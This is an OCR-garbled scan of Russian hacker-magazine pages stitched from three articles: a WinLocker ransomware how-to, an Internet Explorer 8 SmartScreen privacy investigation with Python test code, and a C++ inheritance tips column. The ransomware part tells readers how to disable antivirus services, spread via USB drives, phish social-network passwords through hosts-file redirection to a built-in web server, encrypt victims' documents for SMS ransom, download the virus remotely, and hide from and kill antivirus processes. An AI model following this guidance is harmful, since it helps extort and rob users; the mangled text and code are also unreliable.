сложить. Например, значение 12 будет соответствовать блокиров- 
ке дисков С (4) и О (8). 
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Редактор групповых политик 



Г ОГРАНИЧИВАЕМ ЗАПУСК ПРИЛОЖЕНИЙ 



С помощью реестра реально определить список одобренных для 
запуска программ. Если этот список задан, то пользователь не 
сможет запустить приложения, которых в нем нет. Список одо- 
бренных к запуску приложений задается здесь: Н КЕѴ_СиННЕІ\ІТ_ 
ЦІ5 ЕР\М і сгозоТЕѴѴѴі п сі о\л/з\С и гге пЕѴе гзі о п\РоІі сі ез\Ехр Іо ге г\ 
РізТгісЕРи п. Создав этом разделе ключи (тип Р ЕѲ_32) для каждой 
разрешенной программе, тебе нужно будет подняться на один 
уровень выше и добавить параметр НезіпеіНип типа бѵѵогб со 
значением 1 . 



Г УПРАВЛЕНИЕ КОМПЬЮТЕРОМ 



Много нехороших дел сможет натворить пользователь, если у него 
имеется доступ к запуску оснастки «Управление компьютером». 
Полностью отключить оснастку с помощью реестра нельзя, но 
удалить ссылку на ее запуск из контекстного меню ярлыка «Мой 
компьютер» — проще пареной репы. Всего лишь требуется создать 
параметр ІЧоМападеМуСотріЛегѴегЬ типа бѵѵогб со значением 1 в 
разделе Н КС П\5оТЕѵѵа ге\М ісго5оТТ\ѴѴіпсІо\л/5\Си ггепТѴе г5Іоп\РоІісіез\ 
Ехріогег. 



V ВЫРУБАЕМ СЛУЖБЫ 



Используя возможности реестра, ты без проблем сможешь отклю- 
чить ненужные пользователю службы (например, антивирусы). 
Полный список установленных в системе служб находится в 
ветке НКЕУ_Е0САЕ_МАСНІЫЕ\5у5І:епп\Сиггеп1:Соп1:го15еІ\5егѵісе5. 
Для деактивации службы отредактируй значение ключа зІагС 
Например, чтобы установить службе «Тип запуска» значение 
«вручную», ключу 5ІагІ необходимо присвоить 3. Если желаешь, 
чтобы твое ПО протянуло во вражеской системе дольше, то сове- 
тую вести в своем творении базу служб антивирусов. То есть тебе 
необходимо четко опознавать сервисы антивирусов и менять им 
тип запуска. 



Г А ЧТО ЕЩЕ НАМ НАДО? 



Типичные функции любого ѴѴіпІоскег’а мы рассмотрели, теперь 
самое время подумать о том, как улучшить наше детище. Честно 
говоря, я не понимаю, почему профессиональные вирусописатели 
не встраивают в подобные вирусы дополнительные полезные функ- 
ции. Ведь нет никакой гарантии, что юзер дотянется до мобилы и 
отправит заветную смс’ку на короткий номер, тем самым обогатив 
автора вируса. Зато всегда есть шанс увести с тачки пользователя 
полезную информацию: пароли на различные сервисы, документы, 
записанные зкуре переговоры и т.д. Мы не будем вводить каких-то 
ограничений, а проапгрейдим нашу софтину по полной программе. 
Итак, ниже я описал шесть фишек, которые было бы полезно реа- 
лизовать в подобном «проекте». 



Заразил компьютер бедного пользователя? Не забудь позаботить- 
ся о его друзьях! Помни, чем шире распространится вирус, тем 
больше шансов получить деньги. Обосновавшись на вражеской 
машине, нужно не терять времени зря, а пытаться найти новый 
плацдарм. Как это сделать? Один из простых и самых действенных 
способов — мониторинг и заражение флешек. Поскольку пользова- 
тели постоянно пользуются флешками, нашему вирусу будет легко 
мигрировать из одной системы в другую. Определить факт подклю- 
чения флешки легко. Достаточно написать код, обрабатывающий 
событие ѴѴМ_ОЕѴІСЕСНАІ\ІОЕ. Пример кода смотри во врезке №3. 

В коде из третьей врезки я использовал константы и структуры, 
описания которых нет в модулях, поставляемых вместе с ОеІрЫ. 

Их придется описывать самостоятельно. Я всю информацию брал 
с М50ІЧ, но ты можешь не париться, а сразу взять исходник моего 
кода на 0Ѵ0. 



ФИШКА №2: ВАШИ ПАССЫ БУДУТ НАШИ! 



^рЕѵѵт 



Какими ѵѵеЬ-сервисами пользуется современный юзер? Не нужно 
быть семи пядей во лбу, чтобы назвать хотя бы несколько из них: 
почта, одноклассники, Вконтакте, Тасе Ьоок, ТѵѵіТТе г, еіс. Список 
можно продолжать до бесконечности. К чему это я клоню? А к 
тому, что находясь на вражеской территории, было бы неплохо 
собрать все пароли. Авось, в будущем пригодятся. К тому же, имея 
на руках такие козыри, становится реальным простимулировать 
жертву. Например, получив пароли от всевозможных аккаунтов, 
автор вируса может воспользоваться ими для смены контактных 
данных и изменения паролей на свои. В результате реальный 
пользователь попадет в очень нехорошую ситуацию. Проще говоря, 
он лишается своего аккаунта. Это уже куда серьезней заблокиро- 
ванного рабочего стола, а раз так, то шансы оплаты твоих «услуг» 
возрастают. 

Сразу возникает вопрос, а каким образом это проще всего сде- 
лать? Обычно юзеры хранят свои пароли прямо в браузере, 
поэтому сразу возникает идея угнать файлик хранилища паролей. 
Пример такого угона был продемонстрирован в статье «Злобный 
комп». Я же продемонстрирую тебе альтернативный способ. 

Идея заключается в банальном модифицировании Ьозіз. В этом 
файле прописываются соответствия типа «символьный адрес 
сайтаяр». Наша программа должна уметь модифицировать этот 
файл и добавлять соответствия для популярных ѵѵеЬ-сервисов. «А 
куда будем перекидывать юзера?». Можешь для этого состряпать 
свой еѵі 1-сайт, на котором и будут располагаться скамы популярных 
сервисов. Этот способ прост в реализации, но при массовом зара- 
жении пользователей такие сайты наверняка не будут жить долго. 

В связи с этим откажемся от предложенного способа, а пойдем 
не совсем стандартным путем — встроим в вирус маленький ѵѵеЬ- 
сервер. При таком раскладе пунктом назначения переадресации у 
нас будет ІосаІЬозС 

Например: 127.0.0.1 ѵѵѵѵѵѵ.осіпосіаззпікі.ги 

Рассматривать правку файла Ьозіз не будем, лучше сразу взглянем 
на то, как с помощью ОеІрЫ поднять свой ѴѴЕВ-сервер. Если ты 
постоянный читатель нашего журнала, то должен хорошо ориенти- 
роваться в ѴѴіпзоск АРІ. В свое время в рубрике Кодинг проскаки- 
вали статьи про написание всевозможных клиентов (ЕТР, РРОХУ, 
ІРС и т.д.) с использованием лишь арі-функции. Рекомендую тебе 
поднять подшивку и хорошенько ознакомиться с сабжевой темой 
(масло масляное — прим, ред.) . Разобрался? — Кури врезку! 

Теперь, вместо одноклассников. ру, жертва попадет не на настоя- 
щий сайт популярной социальной сети, а прямо в лапы нашего 
еѵіі-сервера. Само собой, ѵѵеЬ-сервер должен быть вежливым 
и отобразить реальную страницу одноклассников (читай — скам 
сайта, его нужно заранее подготовить). Ну а дальше все просто: 
юзер вбивает свои данные для входа, после чего наш ѵѵеЬ-сервер 



► 104 
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их сохраняет. Чтобы откровенно не палиться, желательно сделать 
редирект на страницу с предупреждением о том, что сайт в данный 
момент закрыт на профилактические работы. Или, как вариант — 
сохранив, форвардить введенные данные на реальные однокласс- 
ники. 

ФИШКА №3: ЭКСТАЗИ ДЛЯ ПОЛЬЗОВАТЕЛЯ 

Как зло-программеры стимулируют пользователя на расставание с 
кровными платными 5М5? По-разному. Например, шифруя ценные 
для него файлы. На какие файлы обращать внимание? Лучше всего 
на те, от которых может зависеть работа/учеба жертвы, например: 
документы (бос, хіз, тбЬ, ррТ, М], изображения Уред, рпд, Ьтр), 
исходные тексты (рбр, раз, с, Ь, срр, брг, ру и т.д.]. Если жертва 
писала дипломную работу или какой-нибудь сверхважный отчет, 
который завтра сдавать, то у злоумышленника есть все шансы 
получить денежное вознаграждение. 

Теперь поговорим о технической реализации этой штуки. Поиск 
файлов осуществляется с функциями РіпбРігзО и ЕіпсІІМехШ из 
модуля ЗузиРІз. Работать с ними легко, но простота такого фаст- 
фуда отрицательно отразится на фигуре нашего приложения. 
Поскольку набирать лишний вес нам ни к чему, мы воспользуемся 
более диетическими продуктами: РіпсІРігзіРіІеО и РіпсШехіРіІеП. 
Работать с ними чуть сложнее (см. пример поиска файлов на 
диске), но красота требует жертв. 

Шифрование файлов средствами ОеІрЫ также осуществляется 
достаточно просто. Все зависит от выбранного способа шифрова- 
ния. Можно просто воспользоваться готовыми модулями, которых 
пруд пруди на іоггу.пеі: и на других сайтах. Например, мне попался 
неплохой вариант от одного из разработчиков ОеІрЫ. В этом моду- 
ле реализованы следующие функции: 

//Шифрование файла 

іипсСіоп РііеЕпсгурС ( ІпРііе , ОиСРііе: ЗСгіпд; 

Кеу : ТШогсІТгірІе) : Ьооіеап; 

//Расшифровка файла 

іипсСіоп РііеБесгурЦ ( ІпРііе , ОиСРііе: ЗСгіпд; 

Кеу: ’ШогсІТгірІе) : Ьооіеап; 

//Шифрование текста 

ІипсСіоп ТехРЕпсгурР ( сопзС з: зСгіпд; 

Кеу: ТШогсІТгірІе) : зСгіпд; 

//Расшифровка текста 

ІипсСіоп ТехСБесгурС ( сопзС з: зСгіпд; 

Кеу: ’ШогсІТгірІе) : зСгіпд; 

//Шифрование "памяти" 

ІипсСіоп МешогуЕпсгурЦ ( Зге : РоіпСег; ЗгсЗізе: 

СагЬіпаІ ; 

ТагдеС : РоіпРег; ТагдеСЗіге: СагЬіпаІ; 



Кеу: ’ШогЬТгіріе) : Ьооіеап; 

//Расшифровка «памяти» 

іипсСіоп МешогуБесгурС ( Зге : РоіпСег; 

ЗгсЗіге: СагЬіпаІ; ТагдеС : РоіпРег; 

ТагдеСЗіге: СагЬіпаІ; Кеу: ТШогЬТгірІе) : Ьооіеап; 

Полный текст этих функций, а также примеры их использования ты 
найдешь на нашем диске. 

ФИШКА №4 РАЗМНОЖАЙСЯ! 

Попав в чужую систему нужно постараться удержаться в ней как 
можно дольше. Я не могу подсказать тебе стопроцентный способ 
реализации. Первое (и самое простое в реализации), что мне при- 
шло в голову, встроить в ѵѵі п Іоске г мини-джойнер. Алгоритм таков: 
при активации в системе жертвы основная программа будет зара- 
жать наиболее часто используемые программы. Причем, сам вирус 
к ним прицепляться не должен. В качестве паразита будет высту- 
пать маленькая «безобидная» программка. Ее основной функцией 
будет выполнение проверки на наличие запущенного процесса 
вируса. Если его нет, то необходимо инициировать загрузку «виру- 
са» из интернета и дальнейший его запуск. 

С точки зрения программирования создать щіпег совсем не слож- 
но. К тому же, пару лет назад (см. статью «Вместе веселее» в #104) 
мы освещали эту тему на страницах нашего журнала. 

ФИШКА №5: ИГРАЙ В ПРЯТКИ ПО МАКСИМУМУ 

Как показала практика, авторы ѴѴіпІоскег’ов не сильно заботятся о 
безопасности своих детищ. Защита большинства представителей 
этой группы вирусов, попадавшихся мне на глаза, сводилась к 
банальному присвоению неприметного имени файла. Например: 
Бузует. ехе, іі5ег32.ехе, СБгзз.ехе, еріогег.ехе и так далее. Я не 
думал, что подобные способы еще катят, но как выяснилось, я 
заблуждался. 

Рекомендую тебе не пренебрегать безопасностью, а предусмотреть 
несколько разных алгоритмов: 

1. Давай файлу вируса неприметное имя. Хоть это и примитивное 
правило, но соблюдать его крайне желательно. 

2 . Удали вирус из списка процессов. Этого можно добиться, разо- 
бравшись с перехватом АРІ функций. Мы уже много раз писали про 
перехват АРІ. Обязательно перечитай эти статьи! 

3. Используй несколько способов автозагрузки. 

ФИШКА №6: УБИТЬ НА СТАРТЕ 

Не поленись и напиши процедуру принудительного завершения 
процессов. Она обязательно поможет тебе уберечь свое детище 
от злобных антивирусов, которые пользователь будет пытаться 
запустить. В идеале вообще организовать перехват функций, 
использующихся для запуска программ, и не допускать, чтобы они 
нормально работали. 

ѴѴОРК СОМРЬЕТЕ 

Написать ѴѴіпЕоскег и срубить на нем несколько сотен баксов 
— более чем реально. Пользователи по-прежнему не думают о 
безопасности и при возникновении щепетильной ситуации готовы 
отправить заветную смс’ку, нежели напрягать свои извилины. Я 
показал тебе самый примитивный скелет ѴѴіпІоскег’а. В принципе, 
довести его до боевого состояния — дело нескольких часов. Только 
нужно ли это делать? Выбор за тобой! Главное не забывай о том, 
что написание и распространение вирусов — уголовнонаказуемое 
деяние, за которое можно словить реальный срок. Само собой, 
исходник полноценного вируса я не дам. Нет, не потому что я жад- 
ный. Эти вирусы и так всех достали, поэтому я чертовски не хочу, 
чтобы после этой статьи их стало еще больше. Вдобавок, мне не 
хочется читать новости про то, как правоохранительными органами 
были задержаны очередные создатели ужасных вирусов :). □с 
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ИССЛЕДУЕМ ПОДХОДЫ К КОНФИДЕНЦИАЛЬНОЙ 
ИНФОРМАЦИИ В ІЕ8 

Если честно, я люблю МісгозоН. Люблю давно, беззаветно, 
не расстаюсь с виндой и даже приобрел себе лицензионную версию 
Семерки. И тем не менее, мне кажется, что разработкой операционной 
системы в Майкрософте занимаются лучшие разработчики, 
а разработкой браузера... ну, скажем так, троечники. 



ОДА ПРЕМУДРОМУ ЗМАКТЗСКЕЕИ’У 

Довелось мне по роду своей милицейской деятельности исследовать 
5таіі5сгееп — это система в Іпіегпеі Ехіогег, которая должна защи- 



щать нас от «злых» мошенников со сплойтами на сайте. 5таіі5сгееп 
при открытии любой странички посылает запрос на адрес игз. 
т іеговой. сот приблизительно такого содержания: 



ПРИНЦИП РАБОТЫ 



ЗАРЕ ВКОѴѴЗШВ ОТ 6006І.Е 



Работа системы блэклистов от Гугла построена на основе локаль- 
ных баз блэков. По адресу Иир://5аТеЬгоѵѵ5Іпд.с[іеп1:5.доодІе.сот/ 

браузеры СЬготе и РігеРох получают обновления баз данных блэ- 
клистов в формате тб5 от игі. Дальше браузер берет тб5 от каж- 
дого адреса, на который заходит, и смотрит, есть ли данный тб5 в 
базе. Если есть — значит, сайт «плохой». Это первая версия их АРІ 
Вторая версия несколько сложнее, но принцип остался тот же. О 
новой версии можно почитать здесь — бирѴ/сосІе.доодІе.сот . 



РОЗТ /игз . азтх?МЗРКІІ-С1іепк-Кеу=17т7ЕѵМ2К/ 
ІѴЫОСВР7АѴРд%ЗсІ%3(І&МЗРКІІ-РаЦегШеса-Ьоск=ХсІХ1лГЗІ8МдВд%Зса 
НТТР/1 . 1 

Нозк: игз .тіегозокк . сот 

<зоар : Епѵеіоре . . . хзоар : ВосЗухЬоокир хт1пз= "Ьккр : // 
Місгозокк . ЗТЗ . ЗТЗѴ/еЪ/ " ><г зоарепс : аггауТуре= "хзсі 
: зкгіпд [1] " ><зкгіпд>1іккр : //кикашс . сотс/зкгіпдх/ 
г><ІБ>{ ВЗВВ5ВВА-Е7Б5-40АВ-А041-А5ВІС0В2 6С8Р} </ 

ІБхѵ зоарепс : аггауТуре= "хзсі: зкгіпд [ 5 ] "хзкгіп 
д>7 . О . 6004 . 6</зкгіпдхзкгіпд>7 . 00 . 5824 . 16386</ 
зкгіпдхзкгіпд>7 . 0 . 6000 . 16386</ 

зкгіпдхзкгіпд>6 . 0 . 6000 . 0 . 0</зкгіпдхзкгіпд>еп- 
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БтагІБсгееп в действии 




Приватность не бываетчрезмерной 



из</зСгіпд></ѵ></Ьоокир></зоар : ВосЗух/ 
зоар : Епѵе1оре> 

В данном запросе ІЕ отсылает ЮРЕ сайта, несколько непо- 
нятных цифр и хешей, и, само собой, немного инфы о нас 
— такой, как ІР-адрес. В ответ мы получаем ответ — «хоро- 
ший» это сайт или «плохой». Только из-за этой системы 
блэклистов, построенной на онлайн-запросах, я не юзаю 
данный браузер. Не очень-то приятно, что кто-то может 
по ІР-адресу узнать историю моих посещений. Конечно, 
мы можем отключить данный функционал в настройках 
браузера, но тогда останемся полностью беззащитными, 
поэтому выбор таков: либо палиться, либо подвергаться 
опасности, либо сменить браузер. «Условия использова- 
ния», которые идут со ЗтагіЗсгееп, заверяют, что получен- 
ная инфа не будет использоваться и что все это хозяйство 
абсолютно анонимно. Нам бы теоретически следовало 
поверить в это :], но мои эксперименты показывают, что 




С ІЕ вряд ли получится быть втени 



это утверждение не совсем соответствует действитель- 
ности. Однако, пока опустим данный факт, оставив его для 
будущих статей. 

Аналогичный метод проверки ІІРЕов на блэки использует 
последняя Орега. Ничего не понимаю! На мой взгляд, 
нормальная система — это когда браузер скачивает базу 
блэков на локальный комп и там уже их тестирует. Так, как 
это реализовано в браузерах СЬготе и РігеРох. 

Еще одним нововведением в ІЕ 8 стал Штирлиц-режим 
(ІпРгіѵаІе Вгоѵѵзіпд), при использовании которого теорети- 
чески на компе ничего не должно сохраняться. 

Мне захотелось исследовать, как совместно работают эти 
две системы. 

Окей, задумано-сделано. Я перешел в Штирлиц-режим, 
зашел на сайт из блэклиста, и... ІЕ показал красное 
окошко. Получается, и в Штирлиц-режиме ЗтагіЗсгееп 
работает как обычно — Майкрософт знает, какие сайты мы 
посещаем. 

Ну хорошо, ставим в уме еще один минус и продолжаем. 
Для детального исследования я навесил на ІЕ снифер для 
мониторинга запросов. Открыл сайт — запрос идет на ига. 
тісгозок.сот . Закрыл браузер, снова открыл тот сайт... 
запрос не идет. Значит, результат закэшировался. А рабо- 
тает ли кэширование в Штирлиц-режиме? Дрожащими (от 
волнения, а не от похмелья] руками проверяю эту гипотезу. 
Вот черт! В ІпРгіѵаПе кэширование тоже работает! 

Пробую закрыть браузер и открыть заново — и все еще 
немного надеюсь, что кэш очистится. Но нет. Он остается. 
То есть, после того как ты походишь в приватном режиме 
по сайтам подозрительного содержания, теоретически зав- 
тра к тебе могут прийти компетентные личности и узнать, 
что именно ты был вчера на сайте похеканного банка. 

ПРУФЫ В СТУДИЮ 

А что, если я ошибаюсь? Пожалуй, нам нужны доказатель- 
ства. И лучшим доказательством будет прога, которая смо- 




> Дуй 

• Полные исходники 
прокси-сервера 

и скрипта для про- 
верки ІЕ смотри 
на диске 

• Чтобы ты не 
мучился с проведе- 
нием описанного 
эксперимента, на 
диске смотри видео 
об использовании 
скриптов 




НТТР://ѴѴѴШ 

■ I 

> Цпкб 

• Описание работы 
5аТе Вгоѵѵзіпд от 
боодіе 
ШрУ/сосІе. 
доодіе.сот/аріз/ 
заІеЬгоѵѵзіпд 

• Модуль для РуШоп 
для тестирования 
приложений 

ЫіТр :// рѵѵѵі па иіо. 
орепда.огд 
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01* ЕШГ иц 0*у внкткй ЗиЛ 0*4) 

^ г дЗ 0 О М® Оі пѵ» ГиСк-г^*-(нжп(» СМ 

КНай Ѵ1і*ий • Д^ІІзПгісЧ '’^ПЛІР :■ ЧЧІ с- ВВС |]№*Ьоак р ШП#Ш «1 
фСм$*>* - &ІЗДІЖ* Л5І* ІР*гп** Ілл*д« т ^МфяпЛел* 



ДерогіесІ АКаск 5І1е! 

ТМ5 -«еЬ 5ІЕе аЕ ѵ^^.Ітк-те-ритрэ.сот Ііэз Ьееп геропей аз ап 
аяаек зііЕе алсі кіаз Ьееп Ыоскей Ъазес] ал уоиг зесигііу 
ргеГегепеез. 



АККЧ 5Й№ Егу Ео ІП5(.>І| ргодгдпѵі ІГчд[ -5(РЛІ рПТОЙ» іп?ОПіЧ(іОП. угс уоиг 

сапцмАе* (о дДікЬ мЬсге. о г {Мтада уоиг &у*И;т. 

&штш ЛІлСк іпеі ііИМ: №ФГМІІу аіьСпІііЛе ЬйіЧгіГііі ІйПНгіге. Уи' пипу Ш 
сршргрігіаеіі шГіІшиІ ІН* 1с ікі лг- и-сЬс^и- сі ■ реіпсі&ыап р[[іісіг йигпегѵ. 




X Рпй: |_ 





Воттак РігеРох предупреждает© опасности 



РігеРох как был вторым р Мусорная корзина ■ 
так, к сожалению, специально для ІЕ 

и остается 



сіеЕ с!о_С0№ТЕСТ(зе1Е) : 

ореп ( 1 сі: \\ЕезЕ . ЕхЕ ' , 'ѵг+ ' ) . сіозе ( ) 

# ... 







Ргоху 0.41% — 
ЕхрЮИ 0.47%- 

СІіскег 0.61%“ 

ПооІкЯ 1,23%“ 



ОіЬег 

35,84% 



Іліозіеаіег 

23.67% 



Іпіесіог 4.31% 



ОомтіоасІ&г 
17 64% 



Небольшая статистика того, как нас заражают 
«плохие» сайты 



жет показать нам список сайтов, посещенных юзером ушастым в особо 
приватном режиме от Майкрософт. 

Идеальный вариант — найти кэш и посмотреть в нем конкретные 
1)РІ_’ы. Чтобы его найти, я натравил файловый анализатор на ІЕ, и 
после просмотра логов нашел такой интересненький файлик: 
СЛОосштепТв апб 5еШпдз\асІппіп\І_осаІ. БеШпдзМетрогагу I пЕегпеІ: 
РІ[е5\АпбРЫ5Ыпд\2СЕ0ВРВС-0ВА8-43АА-В1Р0-СС8Е6316ЕЗЕ2.ба1 
(адрес в ХР). 

После удаления этого файла оказалось, что ІЕ делает повторный 
запрос. 

Но, к сожалению, это не он, поскольку файл не изменяется ни по 
размеру, ни по содержанию. Найти настоящий кэш мне не удалось. 

Но какой я был бы хакер, если бы не смог найти обходной вариант? 
Вспомни мою статью о нестандартном использовании Зоскз-сервера, 
следуя этому принципу можно написать прокси-сервер, который будет 
смотреть, пошел запрос на и гз.гтіі сгозоіі. сот , или нет. Если запрос 
был, значит, на сайт юзер еще не заходил, а вот если запроса нет, то 
это значит, что юзер раньше был на этом сайте, и проверка сайта на 
блэки взялась из кэша! 



А теперь напишем скрипт, который будет открывать в ІЕ сайты, и про- 
верять, есть ли наш файл-флаг ТезЕЪсЕ Если файла нет, то выведем 
сообщение о том, что юзер раньше на нем был: 

игіз = ( 

1 ТіЕЕр : / /поЕ_рогп1 . сот/ ' , 

' Ъ.ЕЕр : / / зирег_рирег_рогп1 . сот/ 1 , 

) 

Еог игі іп игіз: 

Еіте . зіеер ( 1 ) 

Егу : 

оз . гетоѵе ( 1 сЗ. : \\ЕезЕ . ЕхЕ ' ) 
ехсерЕ : разз 
ЕезЕ_иг1 (игі) 

ІЕ поЕ оз . раСЪ. . ехізЕз ( 1 сі : \ \ ЕезЕ . ЕхЕ ' ) : 
ргіпЕ "ТТ ѵ^еге оп Йііз зіЕе: %з" %иг1 

Осталось лишь написать функцию 1ез1:_и гі, которая запустит ІЕ с нашим 
ЦІ РИ. Знаешь, кажется просто открывать другие приложения, и раньше 
я думал, что РуіЬоп сможет запустить ІЕ даже без дополнительных либ, 
но натолкнулся на маленькую «фичу» — если я запускаю ІЕ (или любую 
другую программу], то скрипт не завершится без закрытия ІЕ. Поэтому 
для запуска лучше использовать модуль руѵѵіпа иіо ( ЫірУ/рѵѵѵіпаиію. 
орепда.огд ]. который использует ѴѴіпАРІ. Получим такой код запуска ІЕ: 

ргод_іе = г"С : \Ргодгаш Еі1ез\ІпЕегпеЕ Ехр1огег\ 
іехріоге . ехе" 

аррІісаЕіоп. АррІісаЕіоп. зЕагЕ ( "%з %з"% (ргод_іе,иг1 . 
сіесосіе ( 'иЕЕ-8 ' ) ) ) 

А закрывать браузер мы также будем через ѴѴіпАРІ, для чего подойдут 
маленькие функции: 

ітрогЕ міп32диі 
ітрогЕ міп32соп 



МИР ТРУД, МАЙ, РѴТНО№ 

Написать прокси-сервер с нуля несложно, но лень. Поэтому взял для 
нашего эксперимента ТіпуНТТРРгоху, написанный, конечно же, на 
Руібоп’е. В нем есть функция бо_СОІ\ІІ\ІЕСТ, которая обрабатывает 
НТТРЗ-запросы. Если заставить ІЕ использовать наш прокси, то эта 
функция будет вызываться каждый раз при запросе игз.тісгозоН.сог 
Для передачи полученной информации другим программам можно 
использовать мютексы, базу данных или еще что-то, но мы пойдем 
легким путем и заюзаем файлы как флаги. Если файл есть — запрос к 
Майкрософту был, файла нет — значит, и запроса не было. 



сіеЕ ѵ\ліпскж_епитегаЕіоп_1іапс11ег_іе (Тіѵтсі, гезиІЕЬізЕ) : 
ІЕ зЕгіпд . Еіпсі (міп32диі . СеЕШіпсІоѵ/ТехЕ (Ъмпсі) , \ 

" ІпЕегпеЕ Ехріогег" ) != -1: 

гезиІЕЬізЕ . аррепсі (Тжпсі) 
еізе : 

Ыопе 

сіеЕ с1озе_ргодгаш_іе ( ) : 
іе_міпс1омз = [ ] 

ш_п32диі . ЕпитШпсТомз (міпс!оѵ\г_епитегаЕіоп_1іапс11ег_іе , 
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УзШМОбз 





Всем знакомое лого ІЕ Уже много летподряд 

он первый 




Дизасемблер ІЮА5М 



іе_тпс!сжв ) 

Іог і іп іе_міпс!сжз : 



Соодіе 

вас) и пи 



Сотраге 



IV 



"М05 

УоигиРЦа 



Схема работы боодІеБаТе Вгоѵѵзіпд 




Статистика использования браузеров 



■ ІпІегпеГ ЕхрЕогег 64.99% 

ШѢеіох 21.81% 

■ 6.60% 

а СНготе 4,92% 



21 . 81 % 



ргод_іе = г"С : \Ргодгат РіІезМпЦегпеД Ехр1огег\ 
іехріоге . ехе" 

аррІісаСіоп. АррІісаЕіоп. зРагР ( " %з %з" % 

(ргод_іе ,иг1 . сіесосіе ( 1 иРР-8 ' ) ) ) 

Ріте . зіеер ( 5 ) 
с1озе_ргодгат_іе ( ) 

Ріте . зіеер (2 ) 

Полностью готовый скрипт прокси-сервера и сам тестирующий скрипт 
лежат на диске. Кроме того, по старой-доброй традиции я снял для 
тебя видео и ты сможешь увидеть их работу. 

Я же еще долго продолжал тестировать свой ІЕ, и с каждым разом все 
больше огорчался. Оказалось, что даже при использовании встроен- 
ной функции «Очистить историю», кэш не удаляется. Пару раз у меня 
получилось так, что после нажатия в ІЕ «Резеі ІЕ», он долго что-то 
делал с винчестером, но этот кэш все равно не удалил. Может, это 
лишь неправильное совпадение: звезд на небе было, а ІЕ тут и ни при- 
чем. Я верю в чудеса :). 



Ш-П32диі . ЗепсЗМеззаде (і ,міп32соп. Ѵ\/М_СЬ08Е ,0,0) 

Функция ѵѵіпбоѵѵ_епитегабоп_Ьапб[ег_іе получает хендл окна и про- 
веряет бИе, если это заголовок ІЕ, то этот хендл добавляется к списку. 
Данная функция используется в функции сІ05е_ргодгат_іе, которая 
через ѴѴіпАРІ ЕпитѴѴіпсІоѵѵз перебирает все окна и возвращает список 
окон ІЕ. Дальше всем этим окнам мы посылаем сообщение ѴѴМ_СЕ05Е, 
что аналогично нажатию пользователем кнопки «закрыть окно». 

Собрав все в кучу, получим нужную нам ІезІ_игІ: 

ітрогР міп32диі 
ітрогР ѵ\гіп32соп 

Ргот руміпаиРо ітрогР аррІісаРіоп 
сіе! РезР_иг1 (игі ) : 



ПАРОЧКА ПЛЮСОВ 

У меня есть стойкое ощущение, что под конец этой статьи я должен 
объявить о нахождении в ІЕ какого-нибудь важного плюса. Я долго 
думал и в результате пришел к выводу, что в Ослике их есть целых два: 

• первый — это тот факт, что система от Майкрософта очень неплохо 
работает, быстро и оперативно добавляя «плохие» домены в блэклист; 

• второй плюс придется по душе обладателям плохого интернета, с 
маленькой скоростью и большим количеством (ни единых!) разрывов. 
Мне кажется, что в таких условиях ІЕ работает лучше, чем другие брау- 
зеры. 

Я привык называть режим ІпРгіѵаІе Вгоѵѵзіпд «Порно-режимом», но 
мне сказали что это слишком пошло (вообще-то я этого не говорил, 
это ты сам придумал — прим.ред), пришлось изменить его шуточное 
название на Штирлиц-режим. нс 
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КОДЕРСКИЕ 

ТИПСЫИТРИКСЫ 

Три правила кодинга на С++ для настоящих спецов 

С++ - ЭТО ОБЪЕКТНО-ОРИЕНТИРОВАННЫЙ ЯЗЫК 
ПРОГРАММИРОВАНИЯ. И В ЭТОТ РАЗ МЫ БУДЕМ ГОВОРИТЬ ТОЛЬКО 
ОБ ООП. БЕЗ НЕГО СОВРЕМЕННОМУ ПРОГРАММИСТУ НУ СОВСЕМ 
НИКАК. А «ПРИПЛЮСНУТОМУ» ПРОГРАММЕРУ ТАК И ВОВСЕ 
ПРИХОДИТСЯ БЫТЬ НАЧЕКУ - ООП В СРР НЕСКОЛЬКО ОТЛИЧАЕТСЯ 
ОТ ПРЕДЛАГАЕМОГО В ДРУГИХ ЯЗЫКАХ ПРОГРАММИРОВАНИЯ. 



Действительно, реализация ООП в С++ не- 
сколько отличается от реализаций в других 
языках. Наследование может быть одиночным 
и множественным, а отдельный путь на- 
следования — открытым, защищенным или 
закрытым. Путь также может быть виртуальным 
и невиртуальным. Для функций-членовтоже 
есть свои варианты: виртуальные, невиртуаль- 
ные, чисто виртуальные. А если добавить сюда 
еще взаимодействие с другими средствами 
языка, то мы получим кучу мелких, но важных 
нюансов, которые просто необходимо знать для 
написания качественного кода на С++. 

Правило №1 

В первом правиле мы поговорим об открытом 
наследовании. Допустим, мы пишем класс 
О (бегіѵесі, производный], который открыто 
наследуется от класса В (базе, базовый]. Соз- 
даваятакую иерархию классов, мы тем самым 
сообщаем компилятору, что каждый объект 
типа О является также объектом типа В, но не 
наоборот. Мы говорим, что В представляет со- 
бой более общую концепцию чем О, а й — более 
конкретную концепцию, чем В. Мы утверждаем, 
что везде, где может быть использован объект 
В, можно использовать также объекттипа 
О, потому что О является объектом типа В. С 
другой стороны, если нам нужен объекттипа О, 
то объект В не подойдет, поскольку каждый О 
«является разновидностью» В, но не наоборот. 
Теперь переведем предыдущий абзац в код. 
Будем использовать понятия человека и 



студента. Каждый студент является человеком, 
поэтому человек будет базовым классом, а 
студент — производным. 

Иерархия классов человек-студент 

сіазз Регзоп {...}; 

сіазз Збибепб : риЫіс Регзоп {...}; 

ѵоісі еаб (сопзб Регзоп &р) ; 

// все люди могут есть 

ѵоісі збибу (сопзб Збибепб &з) ; 

// только студент учится 

Регзоп р; 

Збибепб з; 

еаб (р) ; 

// правильно, р — человек 

еаб ( з ) ; 

// правильно, з — студент, 

//и студент также человек 

збибу ( з ) ; 

// правильно 

збибу (р) ; 

// ошибка! р — не студент 

Код в примере полностью соответствует на- 
шим интуитивным понятиям. Мы ожидаем 
что всякое утверждение, справедливое для 
человека — например что у него есть дата рож- 
дения справедливо и для студента, но не все 
что справедливо для студента — например, что 



он учится в каком-то определенном институте, 
верно для человека в общем. 

Идея торжества открытого наследования 
и понятия «является» кажется достаточно 
очевидной, но иногда интуиция нас подводит. 
Рассмотрим следующий пример: пингвин — это 
птица. Птицы умеют летать. На С++ это будет 
вы глядеть та к: 

Пингвины умеют летать 

сіазз Вігб { 

риЫіс : 

ѵігбиаі ѵоісі біу () ; 

/ / птицы умеют летать 

} ; 

// пингвины — птицы 

сіазз Репдиіп: риЫіс Вігсі { 

} I 

Неожиданно мы столкнулись с затруднением. 
Получается, что пингвины умеютлетать, но это 
совсем нетак. Во всем виновата неточность 
формулировки на человеческом языке. Умеют 
летать только среднестатистические предста- 
вители птиц, а не все. Поэтому наш код можно 
немного изменить. 

Теперь пингвины не летают 

сіазз Вігб { 

